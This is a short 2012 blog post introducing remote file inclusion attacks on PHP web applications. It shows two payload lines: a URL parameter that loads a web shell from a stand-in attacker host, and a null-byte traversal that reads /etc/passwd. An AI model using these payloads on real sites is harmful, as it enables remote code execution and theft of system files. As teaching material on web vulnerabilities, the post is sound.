Irregular Expressions

Aug 29 2012   7:50PM GMT

Remote File Inclusions

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

I am currently testing a few php shells that I have against a test php site I created, and I thought I would share some of the basics of a RFI ( Remote File Inclusion ). When I need to deal with web apps this is the second thing I will try right after SQL injection.

Here is the wikipedia article for another explanation.

In most cases I would use this to either display the contents of a file or execute another php script like a php based shell. If I am not really sure what I am looking for I will use a php based shell, something like this.

Typically what I will do is crawl the site and look for variables on each page and attempt something like this (borrowed from the wikipedia example).

/vulnerable.php?COLOR=http://evil.example.com/webshell.txt?

A very simple and powerful method to attack sites.
Also it can be used for local file traversal, instead of a remote file you can specify a local file.

/vulnerable.php?COLOR=/etc/passwd%00

In these cases the %00 is very important for your success.

 Comment on this Post

 
There was an error processing your information. Please try again later.
Thanks. We'll let you know when a new response is added.
Send me notifications when other members comment.

REGISTER or login:

Forgot Password?
By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: